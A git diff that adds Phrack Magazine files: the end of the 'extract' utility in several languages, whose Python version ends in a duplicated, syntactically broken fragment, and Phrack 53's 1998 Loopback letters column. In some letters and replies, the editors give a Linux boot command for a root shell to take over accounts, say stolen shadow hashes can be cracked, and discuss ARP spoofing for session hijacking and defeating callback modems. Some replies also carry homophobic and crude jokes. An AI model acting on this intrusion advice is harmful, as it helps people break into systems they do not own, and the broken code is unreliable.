+/*  extract.c by Phrack Staff and sirsyko 
+ *
+ *  (c) Phrack Magazine, 1997 
+ *      1.8.98 rewritten by route:
+ *          - aesthetics
+ *          - now accepts file globs
+ *      todo:
+ *          - more info in tag header (file mode, checksum)
+ *  Extracts textfiles from a specially tagged flatfile into a hierarchical 
+ *  directory strcuture.  Use to extract source code from any of the articles 
+ *  in Phrack Magazine (first appeared in Phrack 50).
+ *
+ *  gcc -o extract extract.c
+ *  
+ *  ./extract file1 file2 file3 ...
+ */
+
+ 
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/stat.h>
+#include <string.h>
+#include <dirent.h>
+
+#define BEGIN_TAG   "<++> "
+#define END_TAG     "<-->"
+#define BT_SIZE     strlen(BEGIN_TAG)
+#define ET_SIZE     strlen(END_TAG)
+
+struct f_name
+{
+    u_char name[256];
+    struct f_name *next;
+};
+
+int
+main(int argc, char **argv)
+{ 
+    u_char b[256], *bp, *fn;
+    int i, j = 0;
+    FILE *in_p, *out_p = NULL; 
+    struct f_name *fn_p = NULL, *head = NULL; 
+
+    if (argc < 2)
+    {
+        printf("Usage: %s file1 file2 ... filen\n", argv[0]);
+        exit(0); 
+    }
+
+    /*
+     *  Fill the f_name list with all the files on the commandline (ignoring
+     *  argv[0] which is this executable).  This includes globs.
+     */
+    for (i = 1; (fn = argv[i++]); )
+    {
+        if (!head)
+        {
+            if (!(head = (struct f_name *)malloc(sizeof(struct f_name))))
+            {
+                perror("malloc");
+                exit(1);
+            }
+            strncpy(head->name, fn, sizeof(head->name));
+            head->next = NULL;
+            fn_p = head;
+        }
+        else
+        {
+            if (!(fn_p->next = (struct f_name *)malloc(sizeof(struct f_name))))
+            {
+                perror("malloc");
+                exit(1);
+            }
+            fn_p = fn_p->next;
+            strncpy(fn_p->name, fn, sizeof(fn_p->name));
+            fn_p->next = NULL;
+        }
+    }
+    /*
+     *  Sentry node.
+     */
+    if (!(fn_p->next = (struct f_name *)malloc(sizeof(struct f_name))))
+    {
+        perror("malloc");
+        exit(1);
+     }
+    fn_p = fn_p->next;
+    fn_p->next = NULL;
+
+    /*
+     *  Check each file in the f_name list for extraction tags.
+     */
+    for (fn_p = head; fn_p->next; fn_p = fn_p->next)
+    {
+        if (!(in_p = fopen(fn_p->name, "r")))
+        {
+            fprintf(stderr, "Could not open input file %s.\n", fn_p->name);
+	    continue;
+        }
+        else fprintf(stderr, "Opened %s\n", fn_p->name);
+        while (fgets(b, 256, in_p))
+        { 
+            if (!strncmp (b, BEGIN_TAG, BT_SIZE))
+            { 
+	        b[strlen(b) - 1] = 0;           /* Now we have a string. */
+                j++;
+
+                if ((bp = strchr(b + BT_SIZE + 1, '/')))
+                {
+                    while (bp)
+                    {
+		        *bp = 0;
+		        mkdir(b + BT_SIZE, 0700); 
+		        *bp = '/';
+		        bp = strchr(bp + 1, '/'); 
+		    }
+                }
+                if ((out_p = fopen(b + BT_SIZE, "w")))
+                {
+                    printf("- Extracting %s\n", b + BT_SIZE);
+                }
+                else
+                {
+		    printf("Could not extract '%s'.\n", b + BT_SIZE);
+		    continue;
+	        }
+	    } 
+            else if (!strncmp (b, END_TAG, ET_SIZE))
+            {
+	        if (out_p) fclose(out_p);
+	        else
+                {
+	            fprintf(stderr, "Error closing file %s.\n", fn_p->name);
+		    continue;
+	        }
+            } 
+            else if (out_p)
+            {
+                fputs(b, out_p);
+            }
+        }
+    }
+    if (!j) printf("No extraction tags found in list.\n");
+    else printf("Extracted %d file(s).\n", j);
+    return (0);
+}
+
+/* EOF */
+<-->
+<++> EX/PMEU/extract.pl
+# Daos <daos@nym.alias.net>
+#!/bin/sh -- # -*- perl -*- -n
+eval 'exec perl $0 -S ${1+"$@"}' if 0;
+
+$opening=0;
+
+if (/^\<\+\+\>/) {$curfile = substr($_ , 5); $opening=1;};
+if (/^\<\-\-\>/) {close ct_ex; $opened=0;}; 
+if ($opening) {                        
+        chop $curfile;                 
+        $sex_dir= substr( $curfile, 0, ((rindex($curfile,'/'))) ) if ($curfile =~ m/\//);
+        eval {mkdir $sex_dir, "0777";}; 
+        open(ct_ex,">$curfile"); 
+        print "Attempting extraction of $curfile\n";
+        $opened=1; 
+}
+if ($opened && !$opening) {print ct_ex $_}; 
+<-->
+
+<++> EX/PMEU/extract.awk
+#!/usr/bin/awk -f
+#
+# Yet Another Extraction Script
+# - <sirsyko>
+#
+/^\<\+\+\>/ {
+        ind = 1
+        File = $2
+        split ($2, dirs, "/")
+        Dir="."
+        while ( dirs[ind+1] ) {
+                Dir=Dir"/"dirs[ind]
+                system ("mkdir " Dir" 2>/dev/null")
+                ++ind
+        }
+        next
+}
+/^\<\-\-\>/ {
+        File = ""
+        next
+}
+File { print >> File }
+<-->
+<++> EX/PMEU/extract.sh
+#!/bin/sh
+# exctract.sh : Written 9/2/1997 for the Phrack Staff by <sirsyko>
+#
+# note, this file will create all directories relative to the current directory
+# originally a bug, I've now upgraded it to a feature since I dont want to deal
+# with the leading / (besides, you dont want hackers giving you full pathnames
+# anyway, now do you :)
+# Hopefully this will demonstrate another useful aspect of IFS other than 
+# haxoring rewt
+#
+# Usage: ./extract.sh <filename>
+
+cat $* | (
+Working=1
+while [ $Working ];
+do
+        OLDIFS1="$IFS"
+        IFS=
+        if read Line; then
+                IFS="$OLDIFS1"
+                set -- $Line
+                case "$1" in
+                "<++>") OLDIFS2="$IFS"
+                        IFS=/
+                        set -- $2
+                        IFS="$OLDIFS2"
+                        while [ $# -gt 1 ]; do
+                                File=${File:-"."}/$1
+                                if [ ! -d $File ]; then
+                                        echo "Making dir $File"
+                                        mkdir $File
+                                fi
+                                shift
+                        done                               
+                        File=${File:-"."}/$1
+                        echo "Storing data in $File"
+                ;;
+                "<-->") if [ "x$File" != "x" ]; then
+                                unset File
+                        fi ;;
+                *)      if [ "x$File" != "x" ]; then
+                                        IFS=
+                                        echo "$Line" >> $File
+                                        IFS="$OLDIFS1"
+                        fi
+                ;;
+                esac
+                IFS="$OLDIFS1"
+        else
+                echo "End of file"
+                unset Working
+        fi
+done
+)                                                                    
+<-->
+<++> EX/PMEU/extract.py
+#! /bin/env python
+# extract.py    Timmy 2tone <_spoon_@usa.net>
+
+import sys, string, getopt, os
+
+class Datasink:
+    """Looks like a file, but doesn't do anything."""
+    def write(self, data): pass
+    def close(self): pass
+
+def extract(input, verbose = 1):
+    """Read a file from input until we find the end token."""
+
+    if type(input) == type('string'):
+        fname = input
+        try: input = open(fname)
+        except IOError, (errno, why):
+            print "Can't open %s: %s" % (fname, why)
+            return errno
+    else:
+        fname = '<file descriptor %d>' % input.fileno()
+
+    inside_embedded_file = 0
+    linecount = 0
+    line = input.readline()
+    while line:
+
+        if not inside_embedded_file and line[:4] == '<++>':
+
+            inside_embedded_file = 1
+            linecount = 0
+
+            filename = string.strip(line[4:])
+            if mkdirs_if_any(filename) != 0:
+                pass
+
+            try: output = open(filename, 'w')
+            except IOError, (errno, why):
+                print "Can't open %s: %s; skipping file" % (filename, why)
+                output = Datasink()
+                continue
+
+            if verbose:
+                print 'Extracting embedded file %s from %s...' % (filename,
+                                                                  fname),
+
+        elif inside_embedded_file and line[:4] == '<-->':
+            output.close()
+            inside_embedded_file = 0
+            if verbose and not isinstance(output, Datasink):
+                print '[%d lines]' % linecount
+
+        elif inside_embedded_file:
+            output.write(line)
+
+        # Else keep looking for a start token.
+        line = input.readline()
+        linecount = linecount + 1
+
+def mkdirs_if_any(filename, verbose = 1):
+    """Check for existance of /'s in filename, and make directories."""
+
+    path, file = os.path.split(filename)
+    if not path: return
+
+    errno = 0
+    start = os.getcwd()
+    components = string.split(path, os.sep)
+    for dir in components:
+        if not os.path.exists(dir):
+            try:
+                os.mkdir(dir)
+                if verbose: print 'Created directory', path
+
+            except os.error, (errno, why):
+                print "Can't make directory %s: %s" % (dir, why)
+                break
+
+        try: os.chdir(dir)
+        except os.error, (errno, why):
+            print "Can't cd to directory %s: %s" % (dir, why)
+            break
+
+    os.chdir(start)
+    return errno
+
+def usage():
+    """Blah."""
+    die('Usage: extract.py [-V] filename [filename...]')
+
+def main():
+    try: optlist, args = getopt.getopt(sys.argv[1:], 'V')
+    except getopt.error, why: usage()
+    if len(args) <= 0: usage()
+
+    if ('-V', '') in optlist: verbose = 0
+    else: verbose = 1
+
+    for filename in args:
+        if verbose: print 'Opening source file', filename + '...'
+        extract(filename, verbose)
+
+def db(filename = 'P51-11'):
+    """Run this script in the python debugger."""
+    import pdb
+    sys.argv[1:] = ['-v', filename]
+    pdb.run('extract.main()')
+
+def die(msg, errcode = 1):
+    print msg
+    sys.exit(errcode)
+
+if __name__ == '__main__':
+    try: main()
+    except KeyboardInterrupt: pass
+
+
+    except getopt.error, why: usage()
+    if len(args) <= 0: usage()
+
+    if ('-V', '') in optlist: verbose = 0
+    else: verbose = 1
+
+    for filename in args:
+        if verbose: print 'Opening source file', filename + '...'
+        extract(filename, verbose)
+
+def db(filename = 'P51-11'):
+    """Run this script in the python debugger."""
+    import pdb
+    sys.argv[1:] = [filename]
+    pdb.run('extract.main()')
+
+def die(msg, errcode = 1):
+    print msg
+    sys.exit(errcode)
+
+if __name__ == '__main__':
+    try: main()
+    except KeyboardInterrupt: pass              # No messy traceback.
+<-->
+
+----[  EOF
diff --git a/phrack53/2.txt b/phrack53/2.txt
new file mode 100644
index 0000000..263864f
--- /dev/null
+++ b/phrack53/2.txt
@@ -0,0 +1,828 @@
+---[  Phrack Magazine   Volume 8, Issue 53 July 8, 1998, article 02 of 15
+
+
+-------------------------[  P H R A C K     53     L O O P B A C K
+
+
+--------[  Phrack Staff
+
+
+
+[ Ed. note:  The letters are perhaps editted for format, but generally not for
+  grammar and/or spelling.  I try not to correct the vernacular, as it often
+  adds a colorful perspective to the letter in question. ]
+
+0x1>--------------------------------------------------------------------------
+
+[ P52-02@0xd: ... Something you've mailed to a whiley bunch... ]
+ 
+I couldn't help but notice your use of "whiley" rather than the more common
+English word "wily" in the above-quoted paragraph. In the future, take the
+time to grammar and spell check your replies to minimize the emotional
+damage you are bound to suffer.                                       
+    --Bob Stratton
+
+    [ WHOA!  My bad.  Strat has caught me with my proverbial pants around my
+      proverbial ankles.  Further evidence towards me - not - being
+      omnisicient argument (although I still believe this to be conjecture). ]
+
+P.S. Thanks for the sensible code-formatting discussion. Your style sounds
+a lot like that which kept me sane back when I earned my living writing
+code.  The enlightened person's answer, of course, is to use an Emacs minor
+mode, and to let the editor do the work while one types. Emacs is also the
+answer to the Windoze 95 junkie looking for something with which to read
+Phrack. Works for me.
+
+    [ Amen.  Except for the emacs part.  pico with regexp or vim 5.0 with
+      syntax highlighting is the way to go. ]
+
+0x2>--------------------------------------------------------------------------
+
+[ P52-09: On the Morality of Phreaking ]
+
+Dear Phrack,
+
+I am not a hacker nor a hacker wannabe, so I had only the most passing
+acquaintance with your publication.  However, today by chance I came across
+this article in your January 26 issue.
+
+I am impressed. I did my MA in philosophy, and I was quite nonplussed to see
+such a lucid and philosophical point of view in what is, to my understanding,
+a very specialized publication not typically devoted to philosophy.  Though my
+areas of interest were mainly Nietzsche and Deleuze, I found your summary of
+both Mill and Kant to be accurate and well-applied.  Kudos, you obviously have
+some very intelligent people on staff, whose talents are not limited to your
+own area of expertise.
+
+Yours respectfully,
+Sean Saraq
+Toronto
+
+    [ High praise indeed!  Thank you for the compliments.  It's good to see
+      we're read in communities other then that of our target demographic. ]
+
+0x3>--------------------------------------------------------------------------
+
+I can't believe you included article 12 in Phrack 50.  Is Phrack really
+getting so sad? Have you really got nothing better to publish than
+regurgitated crypto babble?
+
+    [ Despite what you may think, we are not sad.  The phrack compound is
+      imbibed with much conviviality and festivity.  Why, every Friday is
+      `punch a mime day`.  We hire a mime to come down to the office and we
+      all take turns punching him in the face. ]
+
+Cheers, Chris (XORed that's Fghyud)    
+
+    [ That's not a very good XOR implementation you have there.  It appears
+      an extraneous character has been inserted.  Check your pad or the stream
+      cipher.  Or perhaps check your other regurgitated crypto babble for more
+      info. ]
+
+0x4>--------------------------------------------------------------------------
+
+For those readers interested in "Piercing Firewalls" (Phrack Issue 52)
+take a look at datapipe.c available at www.rootshell.com. I can't think
+of any way to make it work with X, like tunnel/portal, but it works fine
+with telnet and nothing needs to be running outside the firewall.
+
+ziro antagonist
+
+    [ Noted. ]
+
+0x5>--------------------------------------------------------------------------
+
+Okay, enough nagging about the Milla pics!
+
+The one thing everyone reading Phrack wants to know is:
+When will you publish nude pictures of dangergrl ???
+
+    [ When your mom gives them back. ]
+
+Yours Sincerely,
+-anonymous. (i get kicked from #hack enuf as it is already :)  
+
+    [ What a suprise. ]
+
+0x6>--------------------------------------------------------------------------
+
+While the Juggernaut program is interesting, I've found that its model for
+session stealing is a tad limited.  There are two issues, one of which I've
+dealt with.  First issue is the one packet read, one packet written paradigm.
+It really should allow separate threads for read/write to avoid getting
+easily out of synch.  This I've not dealt with, but it is understandable given
+the second, the ACK storms it creates.
+
+    [ Juggernaut 1.x is very primitive in many ways.  Juggernaut++, the next
+      generation juggernaut,  has been mostly redesigned from the ground up
+      with a 90% new code base.  It has many things the previous versions
+      lacked, including: a much better interface, threading for concurency,
+      portability, effcicieny mods, and many bugfixes. ]
+
+The ACK storms can be avoided with an ARP attack (or possibly an ICMP
+redirect).  Send an ARP message to the source of the connection you're
+stealing (an ARP reply) which tells it that the ethernet address of the
+machine it's talking to (the destination machine, which you want to talk to
+instead) is something "off in space" like 2:3:4:5:6:7 instead of the real
+address.  This needs to be done fairly often, should be started immediately
+before you start your hijack attack.
+
+    [ Indeed.  As long the host will accept and cache unsolicited ARP
+      responses, this will work. ]
+
+The result is that the machine you are intercepting becomes unable to talk to
+the destination and won't desynch the session, and traffic goes to practically
+nothing.  After you stop, the ARP table will shortly expire and be updated
+with correct information, so the attack will either appear as a network
+glitch, or you'll get alerted (NT will alert) that an IP address conflict
+exists (but tell nothing about what the conflict is with).  Moreover, an ARP
+reply will escape the notice of many network monitoring programs.
+
+    [ Something like this has in fact been implemented in juggernaut++...
+      And, just to answer the burning question I get asked so often, NO, J++
+      is NOT publically available. ]
+
+I have sent the code to the original author of Juggernaut (being inclined to
+share knowledge) and wanted to alert you.
+
+    [ The original author of juggernaut and I are pretty close.  I'll be shure
+      to check with him. ]
+
+0x7>--------------------------------------------------------------------------
+ 
+Hi!  My name is StiN.  
+
+    [ Mine's route. ]
+
+I'm from Russia.
+    
+    [ I'm from the U.S. ]
+
+Sorry for my bad English.
+
+    [ Sorry for my bad russian, comrade. ]
+
+I Have a friend His name is Armany.
+
+    [ I have a friend named Gilgamesh. ]
+
+Where do you live?
+
+    [ I live in a small one bedroom aprartment with four cats. ]
+
+How old are you?
+
+    [ 19. ]
+
+What's yore name?
+
+    [ We already went over this. ]
+
+What's yore Hobby?
+
+    [ Volunteering for free medical tests of any variety. ]
+
+Do you knew Russia?
+
+    [ I KNEW RUSSIA BACK IN THE GOOD OLE' DAYS!  Back before the collapse. ]
+
+Good Bay.
+
+    [ Bad Bay:  Bay of Pigs.  Good bay: Bay of jello. ]
+
+0x8>--------------------------------------------------------------------------
+
+Hola, soy Omar
+
+Soy un fantico de su revista, la sigo desde la phrack 48.
+No soy un hacker, phreaker, o cualquier cosa, soy ms un fantico de las
+malditas mquinas.
+Muy buenos artculos; gracias por las cosas de LINUX (me fueron de mucha
+utilidad)
+
+Suerte y sigan as.
+Saludos de Uruguay. South Amrica.
+
+    [ Yo quiero taco bell. ]
+
+0x9>--------------------------------------------------------------------------
+
+hi,
+
+where can i find the source code for the legendary internet worm by
+morris (1988) ?
+
+thanx (i hope u dudez can help me :( )
+
+    [ ftp://idea.sec.dsi.unimi.it/pub/crypt/code/worm_src.tar.gz ]
+
+0xa>--------------------------------------------------------------------------
+
+My friends were going to a basketball game at their gay school (Grades
+
+    [ Wow, they have gay schools now?  Do they videotape you jerking off
+      and looking completely gay and stupid?  (http://www.leisuretown.com) ]
+
+pre-school through 8th grade). They were wearing their wallet chains,
+not causing any harm with them. (It was an after school activity) the
+
+    [ As opposed to those people who have the wallet-chain/morning-stars.
+      They are the ones who cause all that wallet-chain inflicted harm. ]
+
+teachers made them take them off. My friend, Krazy K, asked if he could
+
+    [ Krazy K?  Any relation to Daft D? ]
+
+take off the chain and keep the wallet, but they made him give them the
+whole thing. He thought it was funny, though, especially since he had
+condomes in it (It is a "christian" school). Not that he was going to
+
+    [ Condomes!  The condom that's a tent! ]
+
+use them. They of course being the nosy bastards that they are, rummaged
+around in it to their liking and found them. (We know because they
+talked to him about it. 
+
+    [ Good detective work. ]
+
+He told them it was a joke he was going to do to his friend. "I was going to
+put it in his locker" He said.)      
+
+    [ Now *that's* good humor. ]
+
+I was wondering about the legality of this whole thing. Is it legal
+
+    [ Perhaps you should wonder about the stupidity of the whole thing first,
+      then work your way towards relevance, and then back to stupidity again. ]
+
+to take someones wallet and chain (Which I consider personal property)
+when it is an after school activity and then look through it? They gave
+
+    [ *shrug*  Sure is fun though, isn't it?  Actually, I don't know the laws
+      and regulations of gay schools.  It just might be allowed. ]
+
+him no alternative (but to go home, and, "Oh by the way, you can't use
+the phone"). Then to search through the wallet without permission of the
+owner? I am asking because, I would like to get them in trouble, In
+retaliation to the many times I've been screwed there (I go to high
+
+    [ Been screwed at the gay school?  Hmm.  Did you have any condomes? ]
+
+school now, thank God). If you could tell me, or know of someone who
+knows, then that would help us.   
+
+Thanks,
+
+Abs0lute Zer0
+                    
+    [ You can say that again. ]
+
+0xb>--------------------------------------------------------------------------
+
+Dear Editor,
+
+I would like to take a chance to give my most sincere thanks for
+resurrecting my uttermost respect to the humanity (so often shattered by
+politicians and other freaks) by providing me a unique opportunity to
+immerse myself into the deep wisdom and magic of written word found in the
+Line Noise section.  This is truly the place where one can look for (with a
+sense of deep confidence) a genuine proof that every person is a genius on
+the inside.
+
+    [ Well thank you very much.  Although I think you are refering to
+      loopback. ]
+
+Driven by this wonderful feeling of replenished hope and respect, I'd like
+to answer a cry for help from a young but talented Hacker Demonhawk, who
+expressed a wish to "blow shit up!!".  I used to be a chemist, and I would
+
+    [ Ummm... ]
+
+like to share, in the spirit of the magazine, my knowledge and provide easy,
+quick instructions for young fighting souls that would assist them in the
+aforementioned noble cause.  In other words, how to build a bomb.
+
+    [ Whoops.  You just lost me there. ]
+
+    { rest of message truncated due to overwhelming levels of inanity ... }
+
+0xc>--------------------------------------------------------------------------
+
+where would one go to get "private" hacker help?
+
+    [ In the back where they give the lapdances. ]
+
+0xd>--------------------------------------------------------------------------
+
+sorry to bother ya...
+i was hoping maybe you could give me some info.  don't take me for a complete
+idiot,
+
+    [ Uh oh. ]
+
+i just don't know much about this kind of stuff.
+maybe u could get me started... give a few tips???
+
+    [ Sure.  Never kiss on the first date.  Always pack an extra pair of
+      socks AND underwear.  Never put electrity in your mouth 'just to see
+      what would happen'.  Also, if you happen to find yourself in the
+      position, always at least *ask* to give someone the reach-around; it's
+      common courtesy. ]
+
+0xe>--------------------------------------------------------------------------
+
+Hello,
+My name is Robert  I guess you could call me a beginner hacker I I was
+wondering if you could please help me out I need some hacking numbers and
+
+    [ Ok.  7, 9, 11, 43, and 834. ]
+
+passwords just so I can  play around on them and get good. Also if you have
+
+    [ Sure.  Try `password`, `hacker12`, `pickle`, and  `love`. ]
+
+any files or anything that you think that would be helpful to me please attach
+    
+    [ Alright, /dev/random is a good one to start with. ]
+
+or tell me where I can get them. I just bought the book Secerts Of A Super
+Hacker  By Knightmare is that any good if there is any books I should get
+
+    [ Ah yes, the book of the truly desperate and depraved.  As was said once
+      before by Voayger, Knightmare's biggest hack was getting that book
+      actually published. ]
+
+please tell me or if you have any text please send. I am running windows 95
+
+    [ Can you put Windows 95 in your mouth?  NO!  Such is Mango! ]
+
+Thanks For Ur Time
+Robert
+
+0xf>--------------------------------------------------------------------------
+
+Dear Sir
+I like you hacker people because you made life easy
+to a lot of people
+
+    [ Especially the makers of fine Bavarian shoe-horns. ]
+
+I want to ask you an important question to me
+When connecting to Internet, I found that some sites inform me with my ISP IP#
+
+So if they're any possibility that any site can track me
+and identify the following
+1-what country I came from?
+
+    [ Well; if you're dialing up to your ISP, and connecting to 'sites' from
+      there, that would be a one hop jump out to the world.  And yes; they
+      could find out what country you're coming from, unless you're dialed
+      into a provider in another country.  In which case; it might be a little
+      more difficult.  The other tipoff is when you scan in your birth
+      certificate and put it up on your webpage along side your current
+      address and a head shot.
+
+      That's a 'no-no'. ]
+
+2-what is my phone number?  
+
+    [ Are you asking us if we know your number?  Or if someone can find your
+      number when you connect to their machine and they know your IP address?
+      I'm confused, so I'll answer the question both ways.
+
+      A-1: No. We don't know your number, and we don't want it.  While we're
+      at it. We don't want to make out with you either. Quit sending us the
+      flowers. It's over this time once and for all.
+
+      A-2: If you did something that would incite someone to try to find your
+      phone number; odds are if it was an illegal action your ISP would gladly
+      hand your information to the first law enforcement person who walked
+      through the door.  Or for that matter, anyone who asks nicely.  ISPs
+      aren't exactly known for being well guarded vaults of information. ]
+
+Globally can any site by coordination with my ISP track me and catch me?
+
+     [ Ever hear of Kevin Mitnick? ]
+
+Please provide me with a full answer quickly.
+
+    [ Do people not realize this is a quarterly magazine?  Quick for us is
+      3 months.  If you've done something stupid and gotten busted; our
+      sincerest apologies for being late. Next time we'll drop what we're
+      doing and get right to it. ]
+
+0x10>-------------------------------------------------------------------------
+
+I am a Indiana University student currently studying Criminal Justice.  I am
+trying to gather data and find information concerning computer hacking and
+governmental and/or corporate involvement.  The twist that I am persuing
+concerns a rumor that I had heard.  I was told that when some computer
+hackers were caught, they were recruited by the government and/or
+corporations to work in their security department. Usually where there is a
+rumor, there is some truth to the matter, especially when concerning the
+department of defense.  I don't know if you could help me find information
+concerning this issue.  Any help would be greatly appreciated.
+
+                                                Respectfully,
+                                                        Jason Sturgeon
+
+    [ Well...  We at Phrack haven't heard anything about the DoD hiring
+      'hackers', it's been our understanding that the government at least
+      prefers straight laced guys with military background to handle their
+      stuff.  Although it's not out of the realms of possibility that they've
+      hired 'hackers', if it's happened it's of rare occurance, and those
+      individuals who fit the title of 'hacker' probably don't conform to your
+      definition of what a 'hacker' really is..
+
+     Corporations and The Government for the most part tend to shy away from
+     'hackers', if merely for the stigma of being a 'hacker'.  But as a
+     stereotype, hackers conjur up all sorts of bad mental images for
+     respectable management types.  We're sure it's happened to some capacity,
+     but we have no witty anticdotes concerning it. ]
+
+0x11>-------------------------------------------------------------------------
+
+Hello there
+
+I have heard there are some risks using callback modems.
+Can you give me some more info on this, or info where to look
+
+    [ Risks of callback modems are fairly simple.  The problems involved with
+      them are a little bit more complex.  We'll discuss both in an effort to
+      best cover this subject.  The overall fundamental flaw of callback
+      modems is the idea that you could 'fake' a hang-up on your end, or play
+      a dialtone in an effort to fool the modem into thinking it hung up.  Then
+      you wait for it to dial the number, and once it's done, 'ATA' your modem
+      and pick up the carrier.
+
+      We ourselves have tested this a couple times with moderate success, it's
+      not 100% accurate, and it also depends on the hardware on the remote
+      side.
+
+      If the call-back information is based of ANI, that could provide more
+      problems, since the Phrack staff has heard the rumor that you can fake
+      ANI with certian types of ISDN set-ups.
+
+      The two types of callback modem configurations, one being a program that
+      acts as a frontend to the dialing mechanism, the other being hardware
+      based.
+
+      Such as, you dial in to the modem, the program asks you to authenticate
+      yourself by some means, you do so; it hangs up and calls the number
+      that's paired with your authenication information.  This isn't so bad,
+      but if anyone remembers back when certian BBSs had callback that you
+      could enter, you could make them call arbitrary phone numbers by putting
+      in a fake number if their door was misconfigured.
+
+      As far as hardware based call-back, whence you program the passwords and
+      numbers into the modem and it deals with the whole transaction,
+      introduces a scalability issue as well as the fact that the modem has no
+      means to log on it's own, etc.. etc.. etc.
+
+      If any readers wish to write an article based on this subject you are
+      urged to write it and send it in.  It'd be nice to see some more solid
+      information on this subject.
+
+      As well; if any companies wish to send us modems, we urge you to send us
+      some modems so we can put them up against a battery of hacker tested and
+      hacker approved tests. ]
+
+0x12>-------------------------------------------------------------------------
+
+I would like to know about cellular phones....how to find out secret
+pin, how to listen to calls etc....
+
+    [ I would like to know more about marshmellows. How they're planted, the
+      way they're picked in the spring time as they blossom from the little
+      tiny buds you get in 'Swiss Miss Hot Coco', to the fat chewey vessles of
+      taste and excitment that they are at full maturity.
+
+      I would like to find out the secrets of gravity, as well as a good solid
+      reason why the universe keeps 'expanding' -- without any of that "just
+      because" rhetoric that seems to dominate the subject. ]
+
+If You need the cellular make I'll be obliged to give it to you....       
+
+    [ Wow.  You'll give us your phone just so we can look at it?  Send us your
+      home address and we'll send you a S.A.S.E to mail it back to us in. ]
+
+Thanks. Anthony.
+
+    [ No. Thank _you_ your generosity Anthony! ]
+           
+0x13>-------------------------------------------------------------------------
+
+Hiya,
+
+Not wishing to sound like a playboy forum article but I have read phrack for
+
+    [ Already my interest is waning... ]
+
+quite a while and have only seen cause to write now.
+I commend you on your editorial on C programming style.  The sooner we get out
+
+    [ And I commend you on your commendation.  +100 points. ]
+
+there and club to death those people that use single space indentation the
+better.
+
+I do however have three main points to disagree with you on.
+
+1. Write as many comments as you can.  You may need to remember what it
+was you where coding AFTER copious amounts of recriational drugs.
+
+    [ Nah.  You don't want to get out of hand with the commenting.  You end
+      up commenting needlessly and redundancy abounds.  And if you can't read
+      your own code, kill yourself.  -100 points. ]
+
+2. Put your own varaibles with uppercase first letters (to distinguish them 
+from sys vars)
+
+    [ `sys vars`?  What like argc, argv or errno?  This is a ridiculous
+      suggestion.  It makes your code ugly and harder to parse.  I award you
+      no points. ]
+
+3. In reference to your comment
+
+    "In the grand scheme of things, none are really
+     any more correct than any others, except mine."
+
+It must be said that this is completely wrong.  The only point that counts
+is in fact mine.
+
+    [ Not when it's in my magazine.  With a final score of 0, you lose. ]
+
+Regards,
+andrewm at quicknet dot com dot au
+
+    [ Cute. ]
+
+0x14>-------------------------------------------------------------------------
+
+Dear Guys,
+
+First off, I'd like to say that I am ever more impressed with the quality
+of each successive issue of Phrack.
+
+    [ Danke. ]
+
+The reason for this mail it to respond to the request made by N0_eCH0 in
+Ireland in issue 52. Myself and a few friends are happy to help this guy
+out if we can. I'm afraid that we're no great sources of knowledge, but
+are willing to have a crack at most things.
+
+Anyway, if you can pass this on, as there was no e-mail address for
+N0_eCH0, I'd be much obliged. Keep up the excellent work, I look forward
+to issue 53 !
+
+ben_w@netcom.co.uk          
+
+    [ There you go. ]
+
+0x15>-------------------------------------------------------------------------
+
+To whom it may concern:
+
+I was wonder how I can read someone dir and take over their
+account the kernal is 2.0.0. How could I hack into the system
+without having a passwd!!
+
+    [ I assume you mean Linux.  `LILO: linux init=/bin/sh`.  Oh, and you need
+      console access.  Good luck. ]
+
+Thanx!
+
+Tag
+
+0x16>-------------------------------------------------------------------------
+
+[ P52-19@0x2: Statement of Louis J. Freeh, Director F.B.I... ]
+
+
+Hello,
+
+    I would like to say that the article, published as P52-19 is without
+a doubt one of the most frightening threats to our freedom that man has
+ever seen.
+
+the article is:
+"The Impact of Encryption
+                                                 on Public Safety
+
+                              Statement of Louis J. Freeh, Director
+                                Federal Bureau of Investigation"
+
+    This article basically states that Americans should have now
+personal communication rights whatsoever.  The Director of the FBI
+practically states that strong encryption should be banned from the
+public, because he wants law enforcement officers to be able to read all
+of our mail.  He says that this would be for reasons of terrorists and
+criminals, but fails to state that the security of the average American
+would be compromised. Due to his proposal that  you would have to
+forfeit your key to government officials, and that these keys would only
+be used "for the immediate decryption of criminal-related encrypted
+communications or electronic information.".  Or maybe this way the
+government can just intrecept all of your communications.
+    My main objection to this is the irrelevancy that this would have to
+the general public.  According to US law, the US Postal Service is the
+ultimate form of private security.  The average American should be able
+to send a letter to anywhere in the world, and it should be completely
+safe.  And what more can you send with encrypted email? A program, but
+you can do that with a disk in a letter.  So whats stopping these
+terrorists from hopping on down to the Post Office?
+    Another problem with this proposal is that encrypted information is
+more used to protect your information from other parties then the
+government.  I can guarantee that the average Joe living down the street
+is encrypting his love letter to his mistress Jane so that his wife
+doesn't see int, not so that some lazy, fat, government "official"
+doesn't see it.  Most people use this technology for much more practical
+usage than the deception of the government.  We use it because of the
+millions of people on the Net, and perhapse we don't want those millions
+to see every little thing about our personal lives.
+    And finally, why should the government be able to restrict our right
+to gather peacefully?  With technology moving so fast, i think that it
+is reasonable to assume that the Internet is a gathering place? We have
+all of the means of normal communication and more.  Chat rooms, email,
+and programs like Mirabilis's ICQ allow us to communicate on a whole new
+level.
+    In light of all of this, i hope you share my opinions now about the
+loss of freedom that this would represent.  Thank you.
+
+0x17>-------------------------------------------------------------------------
+
+Hi,
+
+I am a little sysadm on a little Linux-Server on the net.
+
+    [ I have little interest in those details. ]
+
+I am searching for documents about System Security under Linux/UNIX
+just to be up-to-date :) Thank you for your help.
+
+    [ http://www.redhat.com/linux-info/security/linux-security/ ]
+
+And btw...I have parts of the /etc/shadow file from my ISP...what
+can I do with this? Can I just run crack over it?
+
+    [ Well now, that all depends on what parts you have, doesn't it...?
+      If you have the encrypted hashes, then you're in business. ]
+
+And, btw: Not all germans hate americans...I am german and I
+don't hate americans... and my generation has nothing to do with
+the WWII...
+
+    [ Oh, I think you do.  I am relatively certian that, somewhere deep
+      down, you dislike us.  You couldn't take a shellacking like you did
+      in WWII (not to mention spaetzle) and *not* feel some sort of
+      resentment.  It's ok.  Embrace your malevolent feelings.  Hug them.
+      C'mon!  Once you've done that, you can dissolve them.  I admonish you to
+      TURN THAT FROWN UPSIDE-DOWN!  Cmon!  Bodyslam yourself into gayness! ]
+
+-firefox01
+
+0x18>-------------------------------------------------------------------------
+
+     Hello there, good to talk to you. 
+
+    [ Likewise. ]
+
+I am just this "Thinker" with this thought why don't we the Hackers and you
+the one of the major contributing Hacker commune (2600,Phrack,ect) make a Full
+Strong "live" Cryto network for the Hacker and by the Hacker.
+
